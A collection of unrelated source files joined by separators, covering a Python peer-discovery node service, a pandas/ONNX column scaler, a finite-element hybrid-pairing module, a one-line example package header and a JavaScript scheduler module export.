async def _track_last_pong(self) -> None:
async with self.dispatcher.subscribe(PongMessage) as subscription:
async for message in subscription:
self._last_pong_at[message.sender_node_id] = trio.current_time()
async def _manage_routing_table(self) -> None:
# First load all the bootnode ENRs into our database
for enr in self._bootnodes:
try:
self.enr_db.set_enr(enr)
except OldSequenceNumber:
pass
# Now repeatedly try to bond with each bootnode until one succeeds.
while self.manager.is_running:
with trio.move_on_after(20):
async with trio.open_nursery() as nursery:
for enr in self._bootnodes:
if enr.node_id == self.local_node_id:
continue
endpoint = Endpoint.from_enr(enr)
nursery.start_soon(self._bond, enr.node_id, endpoint)
await self._routing_table_ready.wait()
break
# Now we enter into an infinite loop that continually probes the
# network to keep the routing table fresh. We both perform completely
# random lookups, as well as targeted lookups on the outermost routing
# table buckets which are not full.
#
# The `TokenBucket` allows us to burst at the beginning, making quick
# successive probes, then slowing down once the initial burst of tokens has been exhausted.
#
# TokenBucket starts with 10 tokens, refilling at 1 token every 30
# seconds.
token_bucket = TokenBucket(1 / 30, 10)
async with trio.open_nursery() as nursery:
while self.manager.is_running:
await token_bucket.take()
# Get the logarithmic distance to the "largest" buckets
# that are not full.
non_full_bucket_distances = tuple(
idx + 1
for idx, bucket in enumerate(self.routing_table.buckets)
if len(bucket) < self.routing_table.bucket_size # noqa: E501
)[-16:]
# Probe one of the not-full-buckets with a weighted preference
# towards the largest buckets.
distance_to_probe = weighted_choice(non_full_bucket_distances)
target_node_id = at_log_distance(self.local_node_id, distance_to_probe)
async with self.recursive_find_nodes(target_node_id) as enr_aiter:
async for enr in enr_aiter:
if enr.node_id == self.local_node_id:
continue
try:
self.enr_db.set_enr(enr)
except OldSequenceNumber:
pass
nursery.start_soon(self._bond, enr.node_id)
async def _pong_when_pinged(self) -> None:
async def _maybe_add_to_routing_table(
request: InboundMessage[PingMessage],
) -> None:
try:
enr = await self.lookup_enr(
request.sender_node_id,
enr_seq=request.message.enr_seq,
endpoint=request.sender_endpoint,
)
except (trio.TooSlowError, EmptyFindNodesResponse):
return
self.routing_table.update(enr.node_id)
self._routing_table_ready.set()
async with trio.open_nursery() as nursery:
async with self.dispatcher.subscribe(PingMessage) as subscription:
self._ping_handler_ready.set()
async for request in subscription:
await self.dispatcher.send_message(
request.to_response(
PongMessage(
request.request_id,
self.enr_manager.enr.sequence_number,
request.sender_endpoint.ip_address,
request.sender_endpoint.port,
)
)
)
nursery.start_soon(_maybe_add_to_routing_table, request)
async def _serve_find_nodes(self) -> None:
async with self.dispatcher.subscribe(FindNodeMessage) as subscription:
self._find_nodes_handler_ready.set()
async for request in subscription:
response_enrs: List[ENRAPI] = []
distances = set(request.message.distances)
if len(distances) != len(request.message.distances):
self.logger.debug(
"Ignoring invalid FindNodeMessage from %s@%s: duplicate distances",
request.sender_node_id.hex(),
request.sender_endpoint,
)
continue
elif not distances:
self.logger.debug(
"Ignoring invalid FindNodeMessage from %s@%s: empty distances",
request.sender_node_id.hex(),
request.sender_endpoint,
)
continue
elif any(
distance > self.routing_table.num_buckets for distance in distances
):
self.logger.debug(
"Ignoring invalid FindNodeMessage from %s@%s: distances: %s",
request.sender_node_id.hex(),
request.sender_endpoint,
distances,
)
continue
for distance in distances:
if distance == 0:
response_enrs.append(self.enr_manager.enr)
elif distance <= self.routing_table.num_buckets:
node_ids_at_distance = self.routing_table.get_nodes_at_log_distance(
distance,
)
for node_id in node_ids_at_distance:
response_enrs.append(self.enr_db.get_enr(node_id))
else:
raise Exception("Should be unreachable")
await self.client.send_found_nodes(
request.sender_node_id,
request.sender_endpoint,
enrs=response_enrs,
request_id=request.request_id,
)
async def _handle_unhandled_talk_requests(self) -> None:
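# Reply with an empty payload to TALKREQ messages whose protocol has no
# registered handler.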
async with self.dispatcher.subscribe(TalkRequestMessage) as subscription:
async for request in subscription:
if request.message.protocol not in self._talk_protocols:
self.logger.debug("Unhandled TALKREQ: %s", request)
await self.client.send_talk_response(
request.sender_node_id,
request.sender_endpoint,
payload=b"",
request_id=request.message.request_id,
)
#
# Utility
#
async def endpoint_for_node_id(self, node_id: NodeID) -> Endpoint:
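# Prefer the ENR stored in the local database; fall back to a network lookup
# if it is missing.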
try:
enr = self.enr_db.get_enr(node_id)
except KeyError:
enr = await self.lookup_enr(node_id)
return Endpoint.from_enr(enr)
|
##############################################################################
# Copyright 2020 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import pandas as pd
from . import DFPBase
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
import onnx
from onnx import helper
class Scaler(DFPBase):
"""
Normalize column values based on a strategy.
Parameters
----------
inputs : List of strings
Each string is an input column label.
outputs : List of strings
Each string is an output column label.
strategy : String
minmax : same as scikit-learn's MinMaxScaler
standard : same as scikit-learn's StandardScaler
min : subtract the minimum value of a column from the values in that column
"""
def __init__(
self,
inputs=[],
outputs=[],
strategy = None,
):
self.inputs = inputs
self.outputs = outputs
self.strategy = strategy
self.scaler = None
self.mins = []
if strategy == 'minmax':
self.scaler = MinMaxScaler()
elif strategy == 'standard':
self.scaler = StandardScaler()
elif strategy == 'min':
pass
assert strategy == 'min' or self.scaler is not None, "strategy must be one of 'minmax', 'standard' or 'min'"
def fit(self, df, **params):
if self.strategy == 'min':
for input in self.inputs:
self.mins.append(df[input].min())
else:
if len(df.index) > 0:
self.scaler.fit(df[self.inputs])
return self
def transform(self, df):
if self.strategy == 'min':
for input, output, m in zip(self.inputs, self.outputs, self.mins):
df[output] = df[input] - m
else:
if len(df.index) > 0:
df[self.outputs] = self.scaler.transform(df[self.inputs])
return df
def __to_onnx_operator_for_min(self, graph):
for input_column, output_column, m in zip(self.inputs, self.outputs, self.mins):
input_tensor = graph.get_current_tensor(input_column)
output_tensor = graph.get_next_tensor(output_column, input_tensor.type)
kwargs = {}
if graph.is_int_tensor(input_tensor.type):
kwargs['value_int'] = int(m)
elif graph.is_float_tensor(input_tensor.type):
kwargs['value_float'] = float(m)
else:
assert False, input_column + ' column is not a numeric type'
ops = []
min_tensor = graph.get_tmp_tensor()
ops.append(helper.make_node('Constant', [], [min_tensor], graph.get_node_name('Constant'), **kwargs))
ops.append(helper.make_node('Sub', [input_tensor.name, min_tensor], [output_tensor.name], graph.get_node_name('Sub')))
graph.add([input_tensor], [output_tensor], ops)
def to_onnx_operator(self, graph):
if self.strategy == 'min':
self.__to_onnx_operator_for_min(graph)
return
for i, (input_column, output_column) in enumerate(zip(self.inputs, self.outputs)):
input_tensor = graph.get_current_tensor(input_column)
output_tensor = graph.get_next_tensor(output_column, input_tensor.type)
kwargs = {}
if self.strategy == 'minmax':
kwargs['offset'] = [float(self.scaler.data_min_[i])]
elif self.strategy == 'standard':
kwargs['offset'] = [float(self.scaler.mean_[i])]
else:
assert False, 'Unsupported strategy ' + self.strategy
kwargs['scale'] = [float(self.scaler.scale_[i])]
graph.add([input_tensor], [output_tensor], [helper.make_node('Scaler', [input_tensor.name], [output_tensor.name], graph.get_node_name('Scaler'), domain='ai.onnx.ml', **kwargs)])
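# ------------------------------------------------------------------------------
# Minimal usage sketch (not part of the original source). The column names are
# hypothetical and only the self-contained 'min' strategy is shown, since the
# ONNX export additionally requires a graph helper object:
#
#     import pandas as pd
#     df = pd.DataFrame({'a': [1.0, 2.0, 3.0], 'b': [10.0, 20.0, 30.0]})
#     scaler = Scaler(inputs=['a', 'b'], outputs=['a_s', 'b_s'], strategy='min')
#     df = scaler.fit(df).transform(df)  # 'a_s' -> [0, 1, 2]; 'b_s' -> [0, 10, 20]
# ------------------------------------------------------------------------------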
|
# -*- coding: utf-8 -*-
import sys
if './' not in sys.path: sys.path.append('./')
from numpy import array
from itertools import chain
from screws.freeze.main import FrozenOnly
from tools.linear_algebra.gathering.regular.matrix.main import Gathering_Matrix
from tools.linear_algebra.gathering.vector import Gathering_Vector
from tools.linear_algebra.elementwise_cache.objects.sparse_matrix.main import EWC_SparseMatrix
from tools.linear_algebra.elementwise_cache.objects.column_vector.main import EWC_ColumnVector
from objects.CSCG._3d.forms.standard._1s.special.vortex_detection import \
___3dCSCG_1Form_Vortex_Detection___
from objects.CSCG._3d.forms.standard._1s.special.helpers.cross_product_1__ip_1 import \
___3dCSCG_1Form_CrossProduct_1__ip_1___
from objects.CSCG._3d.forms.standard._1s.special.helpers.cross_product_2__ip_2 import \
___3dCSCG_1Form_CrossProduct_2__ip_2___
from root.config.main import cOmm, MPI
class _1Form_Special(FrozenOnly):
def __init__(self, _1sf):
self._sf_ = _1sf
self._vortex_detection_ = None
self._freeze_self_()
def cross_product_1f__ip_1f(self, u, e, quad_degree=None, output='2-M-1'):
"""
(self X 1-form, 1-form). To first cross product with a 1-form then do an inner product with
another 1-form.
output:
'2-M-1': Means we return a local matrix refers to local dofs of e(column) and u (row)
:return:
"""
if output == '2-M-1':
SCP_generator = ___3dCSCG_1Form_CrossProduct_1__ip_1___(self._sf_, u, e, quad_degree=quad_degree)
else:
raise NotImplementedError(f"output={output} is not implemented.")
return EWC_SparseMatrix(self._sf_.mesh.elements, SCP_generator, 'no_cache')
def cross_product_2f__ip_2f(self, u, e, quad_degree=None, output='2-M-1'):
"""
(self X 2-form, 2-form). To first cross product with a 2-form then do an inner product with
another 2-form.
output:
'2-M-1': Means we return a local matrix refers to local dofs of e (column) and u (row)
:return:
"""
if output == '2-M-1':
SCP_generator = ___3dCSCG_1Form_CrossProduct_2__ip_2___(self._sf_, u, e, quad_degree=quad_degree)
else:
raise NotImplementedError(f"output={output} is not implemented.")
return EWC_SparseMatrix(self._sf_.mesh.elements, SCP_generator, 'no_cache')
@property
def vortex_detection(self):
if self._vortex_detection_ is None:
self._vortex_detection_ = ___3dCSCG_1Form_Vortex_Detection___(self._sf_)
return self._vortex_detection_
def hybrid_pairing(self, adt1, e1, time=0):
""""""
assert adt1.__class__.__name__ == '_3dCSCG_T1_ADF', f"I need a 3dCSCG AD-Trace-1-form."
assert e1.__class__.__name__ == '_3dCSCG_1Edge', f"I need a 3dCSCG 1-edge-form."
sf = self._sf_
mesh = sf.mesh
assert sf.TW.BC.body is not None, f'3dCSCG primal 1-sf has no TW.BC function.'
assert sf.BC.valid_boundaries is not None, f'3dCSCG primal 1-sf has no valid boundary.'
assert adt1.prime.TW.BC.body is not None, f'3dCSCG ad-1-trace has no TW.BC function.'
assert adt1.BC.valid_boundaries is not None, f'3dCSCG ad-1-trace has no valid boundary.'
sf.TW.do.push_BC_to_instant(time)
adt1.prime.TW.do.push_BC_to_instant(time)
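#----- assemble the local blocks: T (trace), D (block on the AD-trace dofs), C (complement), b (RHS) -----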
T = adt1.matrices.trace
D = EWC_SparseMatrix(mesh, (adt1.num.basis, adt1.num.basis))
C = e1.matrices.complement
b = EWC_ColumnVector(mesh, adt1)
T.gathering_matrices = (adt1, sf)
D.gathering_matrices = (adt1, adt1)
C.gathering_matrices = (adt1, e1)
b.gathering_matrix = adt1
#----- get boundaries and do a check --------------------------------------
Dirichlet_boundaries = adt1.BC.valid_boundaries
Neumann_boundaries = sf.BC.valid_boundaries
bns = mesh.boundaries.names
SDb = set(Dirichlet_boundaries)
SNb = set(Neumann_boundaries)
assert SDb & SNb == set(), "Dirichlet_boundaries and Neumann_boundaries must not intersect."
assert SDb | SNb == set(bns), "Dirichlet_boundaries and Neumann_boundaries together must cover all mesh boundaries."
#-------- set Neumann boundary condition ---------------------------------------------------
sf.BC.valid_boundaries = Neumann_boundaries
adt1.BC.valid_boundaries = Neumann_boundaries
col_pc = sf.BC.partial_cochain
row_pd = adt1.BC.partial_dofs
T = T.adjust.identify_rows_according_to_two_CSCG_partial_dofs(row_pd, col_pc)
b = b.adjust.set_entries_according_to_CSCG_partial_cochains(row_pd, col_pc)
#-------- set Dirichlet boundary condition -------------------------------
adt1.BC.valid_boundaries = Dirichlet_boundaries
adt_pc = adt1.BC.partial_cochain
D = D.adjust.identify_rows_according_to_CSCG_partial_dofs(adt_pc)
T = T.adjust.clear_rows_according_to_CSCG_partial_dofs(adt_pc)
b = b.adjust.set_entries_according_to_CSCG_partial_cochains(adt_pc, adt_pc)
#---------------- Send T, C for hybrid singularity overcoming ------------------------------
T, C, SKIPPED_edge_elements = self.___PRIVATE_overcoming_hybrid_singularity___(
T, C, Dirichlet_boundaries=Dirichlet_boundaries)
#------------- make a special Gathering matrix for the 1-edge-form ------------------------
eGM = self.___PRIVATE_1ef_hybrid_GM___(SKIPPED_edge_elements)
return T, D, C, b, eGM
def ___PRIVATE_1ef_hybrid_GM___(self, SKIPPED_edge_elements):
"""We make a special gathering matrix of the 1-edge-form using for the hybrid singularity overcoming."""
mesh = self._sf_.mesh
p = self._sf_.space.p
px, py, pz = p
D_p_D = {'NS':px, 'WE':py, 'BF':pz} # Direction-p-Dict
#------- take care of SKIPPED_edge_elements ---------------------------------------------
SKD = dict()
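# SKD maps each skipped edge element number to the number of dofs it carries
# (set by its direction); it is merged across all cores below.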
for e in SKIPPED_edge_elements:
if e in mesh.edge.elements:
meee = mesh.edge.elements[e]
direction = meee.direction
SKD[e] = D_p_D[direction]
___ = cOmm.allgather(SKD)
SKD = dict()
for _ in ___: SKD.update(_)
#---------------------------------------------------------------------------------------
_EEW_GV_ = dict()
TA_NB = mesh.edge.elements.___PRIVATE_find_type_and_amount_numbered_before___()
assert len(TA_NB) == len(mesh.edge.elements)
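# MINUS accumulates the dofs of skipped edge elements numbered before the
# current one; it is subtracted from the normal numbering offset.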
MINUS = 0
for ee in mesh.edge.elements:
if ee in SKD:
_EEW_GV_[ee] = [0 for _ in range(SKD[ee])]
else:
ta_NB = TA_NB[ee]
nx, ny, nz = ta_NB
BEFORE = nx * px + ny * py + nz * pz # normal numbering condition
_2bd_ = list()
for sk in SKD:
if sk < ee:
MINUS += SKD[sk]
_2bd_.append(sk)
else:
break
for _ in _2bd_:
del SKD[_]
BEFORE -= MINUS
direction = mesh.edge.elements[ee].direction
if direction == 'NS':
_EEW_GV_[ee] = range(BEFORE, BEFORE + px)
elif direction == 'WE':
_EEW_GV_[ee] = range(BEFORE, BEFORE + py)
elif direction == 'BF':
_EEW_GV_[ee] = range(BEFORE, BEFORE + pz)
else:
raise Exception()
eGM = dict()
for me in mesh.elements:
E_MAP = mesh.edge.elements.map[me]
GV = list()
for mee in E_MAP:
GV.append(_EEW_GV_[mee])
GV = array([_ for _ in chain(*GV)])
eGM[me] = Gathering_Vector(me, GV)
eGM = Gathering_Matrix(eGM, mesh_type='_3dCSCG')
return eGM
def ___PRIVATE_overcoming_hybrid_singularity___(self, T, C, Dirichlet_boundaries=None):
"""
Parameters
----------
T :
The trace matrix.
C :
The complementary matrix.
Dirichlet_boundaries :
The mesh boundaries where we apply a direct boundary condition to the (AD-)trace dofs.
For example, in the Poisson problem, the potential boundaries are Dirichlet boundaries.
Returns
-------
"""
assert self._sf_.IS.hybrid, f"Only hybrid 1-form has this problem."
assert T.__class__.__name__ == 'EWC_SparseMatrix'
assert C.__class__.__name__ == 'EWC_SparseMatrix'
mesh = self._sf_.mesh
boundaries_names = mesh.boundaries.names
if Dirichlet_boundaries is None:
Dirichlet_boundaries = list()
elif isinstance(Dirichlet_boundaries, str):
Dirichlet_boundaries = [Dirichlet_boundaries,]
else:
assert isinstance(Dirichlet_boundaries, (list, tuple)), \
f"Dirichlet_boundaries={Dirichlet_boundaries} is wrong."
assert len(set(Dirichlet_boundaries)) == len(Dirichlet_boundaries), \
f"Repeated boundaries found in {Dirichlet_boundaries}."
for _, Db in enumerate(Dirichlet_boundaries):
assert Db in boundaries_names, \
f"Dirichlet_boundaries[{_}] = {Dirichlet_boundaries[_]} is not a valid boundary."
nT = dict() # the new Trace matrix.
nC = dict() # the new Complement matrix.
SKIPPED_edge_elements = list()
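# Walk over all edge elements: edges touching a Dirichlet boundary are skipped
# entirely; for the others, the trace entries of the corner-edge dofs are
# zeroed in T and their values moved into the complement matrix C.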
for i in range(mesh.edge.elements.GLOBAL_num):
if i in mesh.edge.elements:
edge_element = mesh.edge.elements[i]
on_mesh_boundaries = edge_element.on_mesh_boundaries
skip = False
for mb in on_mesh_boundaries:
if mb in Dirichlet_boundaries:
skip = True
break
else:
skip = False
skip = cOmm.allreduce(skip, op=MPI.LOR)
if skip:
SKIPPED_edge_elements.append(i)
else:
SOS = mesh.edge.elements.do.find.hybrid_singularity_overcoming_setting(i)
if SOS is None: # this core has no business with this SOS
pass
else:
replacing = SOS.replacing
mesh_element, corner_edge = replacing
through = SOS.through
assert mesh_element in mesh.elements
sf_local_dofs = self._sf_.numbering.do.find.local_dofs_on_element_corner_edge(
corner_edge)
trace_element, trace_edge = through
T_MAP = mesh.trace.elements.map[mesh_element]
for si, _ in enumerate(T_MAP):
if _ == trace_element:
break
trace_face = 'NSWEBF'[si]
tf_local_dofs = self._sf_.space.local_numbering.\
___PRIVATE_find_MESH_ELEMENT_WISE_local_dofs_of_1Trace_edge___(
trace_face, trace_edge
)
positions = edge_element.positions
for pos in positions:
if int(pos[:-2]) == mesh_element:
edge_name = pos[-2:]
break
ef_local_dofs = self._sf_.space.local_numbering.\
___PRIVATE_find_MESH_ELEMENT_WISE_local_dofs_of_1edge_edge___(
edge_name
)
assert len(sf_local_dofs) == len(tf_local_dofs) == len(ef_local_dofs), \
f"Trivial check!"
if mesh_element not in nT:
nT[mesh_element] = T[mesh_element].copy().tolil()
V = nT[mesh_element][tf_local_dofs, sf_local_dofs]
nT[mesh_element][tf_local_dofs, sf_local_dofs] = 0
if mesh_element not in nC:
nC[mesh_element] = C[mesh_element].copy().tolil()
nC[mesh_element][tf_local_dofs, ef_local_dofs] = V
for _ in T:
if _ not in nT:
nT[_] = T[_]
else:
# noinspection PyUnresolvedReferences
nT[_] = nT[_].tocsr()
for _ in C:
if _ not in nC:
nC[_] = C[_]
else:
# noinspection PyUnresolvedReferences
nC[_] = nC[_].tocsr()
nT = T.__class__(mesh, nT, cache_key_generator = 'no_cache')
nC = C.__class__(mesh, nC, cache_key_generator = 'no_cache')
return nT, nC, SKIPPED_edge_elements
if __name__ == '__main__':
# mpiexec -n 5 python objects\CSCG\_3d\forms\standard\_1s\special\main.py
from objects.CSCG._3d.master import MeshGenerator, SpaceInvoker, FormCaller, ExactSolutionSelector
elements = [2,2,2]
# mesh = MeshGenerator('crazy_periodic', c=0.1)(elements)
mesh = MeshGenerator('crazy', c=0.1)(elements)
ES = ExactSolutionSelector(mesh)('Poisson:sincos1')
Dirichlet_boundaries = ['Back', 'Front', 'West', ] #
Neumann_boundaries = ["East", 'South', 'North', ]
# mesh = MeshGenerator('bridge_arch_cracked')(elements)
space = SpaceInvoker('polynomials')([2, 3, 4])
FC = FormCaller(mesh, space)
f1 = FC('1-f', is_hybrid=True)
t1 = FC('1-adt')
e1 = FC('1-e')
f1.TW.BC.body = ES.status.velocity
f1.TW.do.push_BC_to_instant(0)
f1.BC.valid_boundaries = Neumann_boundaries
t1.prime.TW.BC.body = ES.status.velocity.components.T_perp
t1.prime.TW.do.push_BC_to_instant(0)
t1.BC.valid_boundaries = Dirichlet_boundaries
T, D, C, b, eGM = f1.special.hybrid_pairing(t1, e1)
reports = T.do.clean()
# T = t1.matrices.trace
# C = e1.matrices.complement
# T, C = f1.special.___PRIVATE_overcoming_hybrid_singularity___(
# T, C, Dirichlet_boundaries=Dirichlet_boundaries)[:2]
# # # f1.dofs.visualize.matplot.connection_through_trace_dof(55, T, C, t1, e1, checking_mode=True)
# #
# #
# # #
# for i in range(t1.prime.numbering.gathering.GLOBAL_num_dofs):
# f1.dofs.visualize.matplot.connection_through_trace_dof(i, T, C, t1, e1, checking_mode=True)
#
# for i in range(e1.numbering.gathering.GLOBAL_num_dofs):
# f1.dofs.visualize.matplot.connection_through_around_edge_dof(
# i, T, C, t1, e1, checking_mode=True)
|
# -*- coding: utf-8 -*-
"""library - Example module."""
__title__ = 'example'
__version__ = '0.1.0'
__author__ = 'constrict0r <constrict0r@protonmail.com>'
__all__ = []
|
"use strict";
/**
* @name dxScheduler
* @publicName dxScheduler
* @inherits Widget, DataHelperMixin
* @groupName Time Management Widgets
* @module ui/scheduler
* @export default
*/
module.exports = require("./scheduler/ui.scheduler");
|